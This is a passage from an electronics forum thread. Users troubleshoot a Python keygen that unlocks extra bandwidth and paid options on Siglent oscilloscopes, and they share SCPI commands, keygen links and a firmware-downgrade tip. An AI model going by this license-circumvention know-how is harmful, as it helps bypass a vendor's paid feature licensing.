I was not logged in. I tried, and the generated keys still fail.

It seems that for the AWG option, only serial number and model matter

Quote
for opt in otheropt:
    print('{:5} {}'.format(opt, gen(SN)))

I entered the SN in upper case (14 chars).
For MODEL, I tried two things:
Model = 'SDS2304X'
Model = 'SDS2000X'

I entered the generated keys in upper case in the scope GUI; in both cases, it fails.

Atum
« Last Edit: December 31, 2020, 02:23:11 pm by atum »
 

Offline tubularnut

  • Regular Contributor
  • *
  • Posts: 140
  • Country: gb
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #216 on: December 31, 2020, 02:24:21 pm »
Have you put in the "Scope ID" from your scope?
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #217 on: December 31, 2020, 02:37:03 pm »
Gentlemen, X licenses are similar but very different algo.

Also, @atum, SDS X are Blackfin machines with no filesystem. There is no place to telnet into.
 

Offline atum

  • Contributor
  • Posts: 8
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #218 on: December 31, 2020, 02:43:24 pm »
Yes, I also put the scope ID in lowercase without "-"
But, no matter the value, the generated key is the same.

OK, understood, the algo is different. Does it mean that it is impossible to hack?

Atum
« Last Edit: December 31, 2020, 02:45:25 pm by atum »
 

Offline masterx81

  • Frequent Contributor
  • **
  • Posts: 410
  • Country: it
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #219 on: January 01, 2021, 07:30:12 am »
I suspect that only the following models are supported: 'SDS1000X-E', 'SDS2000X-E', 'SDS2000X+', 'SDS5000X', 'ZODIAC-'

Found this: https://www.eevblog.com/forum/testgear/siglent-sds2000x-hack/
« Last Edit: January 01, 2021, 07:33:51 am by masterx81 »
 

Offline atum

  • Contributor
  • Posts: 8
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #220 on: January 02, 2021, 03:12:58 pm »
Thanks for the response.
It seems that the SDS2000X series is not "crackable"
The only thing people did is the bandwidth option ...
I will try to post on the other topic!

atum
 

Offline skoehler

  • Contributor
  • Posts: 26
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #221 on: January 11, 2021, 11:22:19 pm »
I have an SDS1204X-E running firmware 6.1.35R2. I tried the script posted by Coyote above. As you can see from the source, the option codes don't depend on the SCOPEID, only on the SN. (This makes sense, as it must be convenient for customers to order their option codes, and customers won't know about the SCOPEID.) So I took the serial number from the scope UI (SDSMMExxxxxxxx) and put it into the Python script.

The option codes don't seem to work when entering them in the scope UI.

I wonder whether I need to use a different model string. Maybe the script only works for the SDS1104X-E?
« Last Edit: January 11, 2021, 11:28:48 pm by skoehler »
 

Offline wally2q

  • Contributor
  • Posts: 6
  • Country: ca
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #222 on: January 20, 2021, 03:09:43 am »
Hi everyone. 
I'm new to the forum (to post), but have been reading it for a while.  Lots of guidance that got me to purchase a new shiny SDS1004X-E.
I attempted to do the BW upgrade with the python code (thanks for the simple instructions) but the key did not take.
I noticed the 100M key generated by the python code is different from the 100M key I get with the MCBD? command.  From what I read, this means the 200M code won't work - and I can confirm - it doesn't.
Wondering if there is an updated version, or alternate version of the python code.
This is the one I tried:  https://repl.it/@wgoeo/siglent-keygen#main.py
The links provided to the other 2 are broken.  I get an error that the Repl "is up for grabs".
These are the ones that don't seem to exist: https://repl.it/repls/GainsboroAlienatedText#main.py
and: https://repl.it/repls/JauntyAccurateGraphics

My FW is 6.1.35R2

I'd really appreciate any help... link to newer / updated python code etc...

thanks!
 

Offline wally2q

  • Contributor
  • Posts: 6
  • Country: ca
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #223 on: January 20, 2021, 03:11:46 am »
Yup - same issue.
Wondering if there is an updated python code.
(see my previous post)
 

Offline wally2q

  • Contributor
  • Posts: 6
  • Country: ca
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #224 on: January 20, 2021, 03:21:39 am »
I just received my sds1104X-E scope, firmware 6.1.35R2
Hack carried out 200mhz and all options.   :clap:
A big thank you to all for sharing
Connected via LAN, everything is fine.
Connected in wifi with the TP-Link N150 v3 key, it gets complicated.
It works as long as the SSID is visible and not hidden!
Unbelievable.
My SSID contains lowercase and uppercase, I thought the problem came from there. But no.
So for me two solutions to use WebServer remotely:
- LAN provided that I connect directly to the router and not directly to the PC.
- WiFi on condition of making visible the SSID of my network.

Siglent an update to correct this. Not great for security.

May I ask which python code you used? I tried the upgrade and it didn't work. Triple checked everything.
 

Offline wally2q

  • Contributor
  • Posts: 6
  • Country: ca
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #225 on: January 20, 2021, 04:39:11 am »
I figured it out.   from: |O   to: :-+

There were 2 issues:
First off - running the python code remotely on that link's website didn't work for me.  I copied the code and ran it on this online python execution website: https://www.programiz.com/python-programming/online-compiler/
It then returned the correct keys.

Secondly, the correct command in SCPI is: MCBD key........ not MCBD 200MHzkey
I thought the 200MHz had to be there as a prefix to the key... but that's not the case.  I see what the OP meant... i.e. "use the 200MHz key" in that place, but the way it's written, I mistook it as needing that "200MHz" prefix.

cheers!
« Last Edit: January 20, 2021, 04:40:42 am by wally2q »
 

Offline Roger Hartmann

  • Newbie
  • Posts: 1
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #226 on: January 22, 2021, 10:04:25 am »
hello all,

I used the above python script and successfully generated the codes for the Teledyne LeCroy T3DSO1104 (which is the same HW as the Siglent).

The AWG, WIFI and MSO upgrades I can check in the GUI itself. But for the 200MHz upgrade - beside of the "success" return from the SCPI MCBD command, how can I tell if it worked? Beside doing measurements, of course.

thanks a lot, Roger
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #227 on: January 22, 2021, 11:15:30 am »
The only "beside" is entering the equipment and see the BW license file to check its contents.
 
The following users thanked this post: Roger Hartmann

Offline wally2q

  • Contributor
  • Posts: 6
  • Country: ca
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #228 on: January 22, 2021, 03:10:28 pm »
On the Siglent, you can check the model-number in the "information" page - you will notice the 1204 model - depicting the 200mhz version vs the 100mhz which is model 1104.
This will validate that the unit "thinks" it's a 200mhz unit.

Secondly, if you turn the "horizontal" knob, you will be able to get 1 or 2 more settings, down to 1ns per division, whereas the 100mhz unit only goes to 5ns I believe.

Lastly, as far as actual performance, there may be different low-pass filters setpoints for 100mhz versus 200mhz - someone that may have done some actual tests can confirm this.

From a sampling rate, quality of data etc - there is no difference - the same data is presented to the processor, from the A-D.  1GS/s shared per 2 channels (2 A-D's for the 4 channels).  So no more "data" is available... so it only comes down to how the data is used / processed etc. 

Best way to think about it is this way:  this is a native 200mhz device, that was "throttled down" to 100mhz to fit a market-space... rather than a 100mhz device that is "stretched" to 200mhz

 
The following users thanked this post: Roger Hartmann

Offline peter2

  • Contributor
  • Posts: 8
  • Country: nl
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #229 on: January 24, 2021, 11:37:22 am »
I have the SDS 1104X-E in pro mode; the screen says SDS1204X-E and the horizontal scale is now 1.00ns.
Now I will disable the pro mode, to get the keys from the memorydump.bin file.
How do I disable the pro mode?
And are all the options also free in the pro mode?
 

Offline Pugduck

  • Newbie
  • Posts: 3
  • Country: za
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #230 on: January 30, 2021, 05:10:04 am »
Hi, wonder if anyone experienced the same.. I ran the python web interface to generate the 200M bandwidth key for my Siglent 1104x-e scope.
The python app generated 4 possible codes which i tried but none of them worked. I know this as each time i ran a key, I queried it by MBCD? and then my existing key was returned.
Any help would be appreciated. ^-^
 

Offline Pugduck

  • Newbie
  • Posts: 3
  • Country: za
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #231 on: January 30, 2021, 05:27:13 am »
Sorry, had a typo in my previous post, meant MCBD instead of MBCD :phew:
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #232 on: January 30, 2021, 10:16:36 am »
When you are able to generate your current license, then you can be sure you are using the keygen correctly.
 

Offline thaistatos

  • Contributor
  • Posts: 18
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #233 on: January 30, 2021, 11:22:42 am »
Hi, wonder if anyone experienced the same.. I ran the python web interface to generate the 200M bandwidth key for my Siglent 1104x-e scope.
The python app generated 4 possible codes which i tried but none of them worked. I know this as each time i ran a key, I queried it by MBCD? and then my existing key was returned.
Any help would be appreciated. ^-^
check here:
https://www.eevblog.com/forum/testgear/unlocking-siglent-sds1104x-e-step-by-step/200/

You have to enter the bandwidth update by the MCBD command, all other updates directly on the scope. First select the option you want to update and then enter the code.
 

Offline jorgemef

  • Newbie
  • Posts: 3
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #234 on: February 21, 2021, 01:03:40 am »
I also had multiple problems people are reporting, and after reading a lot I found the solution. I had to downgrade first. :) The latest version doesn't support telnet enabling nor some SCPI commands.
 

